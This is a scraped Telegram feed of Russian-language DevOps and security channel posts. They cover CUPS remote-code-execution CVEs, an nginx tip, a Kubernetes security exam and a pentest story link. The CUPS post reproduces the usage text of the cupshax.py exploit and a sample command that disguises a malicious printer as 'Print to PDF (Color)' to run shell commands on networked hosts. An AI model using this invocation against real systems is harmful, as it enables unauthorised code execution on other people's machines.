Forwarded from Похек (Сергей Зыбнев)
This media is not supported in your browser
VIEW IN TELEGRAM
#unix #RCE #CVE
CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177
Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.
Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]
A script for executing commands remotely
options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3
Please open Telegram to view this post
VIEW IN TELEGRAM
Админушки в делах, попозже будет контент;
Кстати если вы столкнётесь с ошибкой таймаута на nginx в режиме (reverse proxy), проверьте файл /etc/resolv.conf (https://www.plesk.com/kb/support/nginx-fails-to-start-on-plesk-server-nginx-service-start-pre-operation-timed-out-failed-with-result-timeout/)
Кстати если вы столкнётесь с ошибкой таймаута на nginx в режиме (reverse proxy), проверьте файл /etc/resolv.conf (https://www.plesk.com/kb/support/nginx-fails-to-start-on-plesk-server-nginx-service-start-pre-operation-timed-out-failed-with-result-timeout/)
nginx.service start-pre operation timed out, Failed with result ‘timeout’
Plesk
nginx fails to start on Plesk server: nginx.service start-pre operation timed out, Failed with result ‘timeout’ - Support Cases…
nginx fails to start on Plesk server: nginx.service start-pre operation timed out, Failed with result ‘timeout’ - Support Cases - Plesk Knowledge Base
Forwarded from Ever Secure (Aleksey Fedulaev)
Только недавно обсуждали в чатике, нужно ли обеспечивать безопасность фронта 🤷♂️, в одном из соседних пабликов спер вам чтиво 😄
Ознакомиться подробнее
👀 @ever_secure
Рад представить вашему вниманиюнебольшойматериал по теме безопасности фронтенда. В данном сборнике упомянуты многие темы, связанные с клиентскими атаками. Показаны примеры из Bug Bounty по ходу изучения и разобраны способы защиты от многих Client-Side уязвимостей
Ознакомиться подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
Vault of DevOps
2022: http , https/tls1.0 2023: https, tls1.3
Аааа страшна за Линукс?)
Vault of DevOps
cks mood:
YouTube
Как я сдал CKS экзамен (Certified Kubernetes Security Specialist)
Хай, в общем расскажу как я сдавал CKS экзамен;
Мои ресурсы:
https://t.iss.one/devops_talk1ng
Ссылки для подготовки:
https://rotoro.cloud/
https://github.com/ViktorUJ/cks/tree/master
https://killer.sh/
Теги для видео (читать не надо):
#devops #devopstutorial…
Мои ресурсы:
https://t.iss.one/devops_talk1ng
Ссылки для подготовки:
https://rotoro.cloud/
https://github.com/ViktorUJ/cks/tree/master
https://killer.sh/
Теги для видео (читать не надо):
#devops #devopstutorial…
Кста, подписчики, я таки сдал CKS;
Обкашлять вопросики можно в комментариях (промокод со скидкой на killer.sh в комментариях)
Обкашлять вопросики можно в комментариях (промокод со скидкой на killer.sh в комментариях)
🔥2
Vault of DevOps pinned «Кста, подписчики, я таки сдал CKS; Обкашлять вопросики можно в комментариях (промокод со скидкой на killer.sh в комментариях)»
Forwarded from PRO:PENTEST
Всем привет!
Дошли руки написать про новый кейс🎯
Приятного чтения🫡
#физический_пентест
#пентест_корпоратианой_инфраструктуры
#социальная_инженерия
https://teletype.in/@r00t_owl/V1cnGQV9eKM
Дошли руки написать про новый кейс
Приятного чтения
#физический_пентест
#пентест_корпоратианой_инфраструктуры
#социальная_инженерия
https://teletype.in/@r00t_owl/V1cnGQV9eKM
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
Взлом промышленного предприятия
Всем привет! Давно не было историй. В этот раз речь пойдет об очень интересном проекте, который я не могу расписать в красках, поскольку...
❤1🔥1